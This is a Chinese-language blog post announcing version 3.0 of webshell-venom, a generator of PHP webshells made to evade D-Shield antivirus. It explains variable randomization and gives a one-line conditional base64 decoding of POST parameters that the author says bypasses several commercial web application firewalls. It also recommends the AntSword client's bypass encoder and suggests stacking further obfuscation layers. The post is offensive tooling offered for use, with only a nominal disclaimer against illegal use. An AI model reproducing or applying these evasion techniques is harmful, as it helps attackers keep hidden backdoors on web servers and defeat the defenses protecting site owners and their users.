一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6

前言

我承诺过300个星后放出3.0

项目地址:

https://github.com/yzddmr6/webshell-venom

webshell-venom 3.0 更新特点:

1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接，故去除头部的404，如有需要自行添加

2. 变量全员随机化，不再有固定的变量名称

3. 增加流量传输编码方式并且兼容原版

4. 免杀依旧，自己扫两遍就知道了

流量编码原理及使用方式：

看了很多文章甚至包括蚁剑的编码器demo里面都是用一些特定的shell来base64或者hex或者gzin的方式来绕过各种waf的流量检测

但是问题就是不兼容，麻烦，还要上不同的马

并且不好做维护，因为你的特定shell一旦成为已知样本后就相当于完全gg

3.0就解决了这个问题

其实原理很简单，就是如下的一行代码：

isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];

如果存在id这个get的参数就把post的数据base64解密一遍

否则就直接传参

也就是说我们只要使用的时候不加id这个参数就能像一般的shell使用

需要过流量检测的时候就加个id=xxx

后面的xxx不固定，也是为了增加随机化

使用实例：

image

生成测试文件test.php

直接明文post

image

加入id参数后base64传参

image

用蚁剑连接的话就用官方的base64_bypass编码器

抓个流量

image

后言

经过测试把参数全部base64后可以绕过某里云 某锁 某狗 某塔，基本上够用了

如果想要gzin或者hex传输请自己修改

base64只是个参考如果觉得一层不够可以多加几层混淆

这个就需要你自己动手了

最后的最后

更新免杀不易，且用且珍惜

还请大家多多支持

禁止用于非法用途！